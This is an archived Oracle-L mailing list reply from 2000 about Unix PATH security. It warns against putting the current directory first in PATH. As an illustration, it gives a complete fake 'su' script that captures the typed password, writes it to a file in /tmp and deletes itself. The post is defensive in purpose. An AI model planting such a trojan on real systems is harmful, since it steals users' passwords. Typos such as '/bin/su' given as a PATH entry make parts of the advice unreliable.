Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Mailing Lists -> Oracle-L -> Re: Unix Security for Unix Gurus

Re: Unix Security for Unix Gurus

From: <IlicR_at_stentor.ca>
Date: Thu, 28 Sep 2000 10:17:38 -0400
Message-Id: <10633.118151@fatcity.com> 





Setting pwd for beginning of your path is really bad.. See your path it has to
start


with /bin/su .. Why ?? See this example ( assume what path is not starting with
/bin/su)


when someone is creating script named su and put somewhere before /bin/su :



su


#! /bin/sh


stty -echo


echo -n "Password"


read PASSWD


stty echo


echo


echo "Sorry"


echo "$1 / $2: $Passwd" >>/tmp/your_sppol_file
rm /your_path_where _you_palce_su/su



You issue su - and your password is written into /tmp/your_spool_file and "su "
script


is deleted.. You won't even notice what your passwd is broken. Be sure what in
your path on first place you have /bin/su .. More about this topic you can find
on site Unix Guru Universe...( owned by Kirk Waingrow) .  Also you can see book
from same author Unix&Hints and Hacks where your question is explained in more
details..
Received on Thu Sep 28 2000 - 09:17:38 CDT












Original text of this message













  HOME |
  ASK QUESTION |
  ADD INFO |
  SEARCH |
  E-MAIL US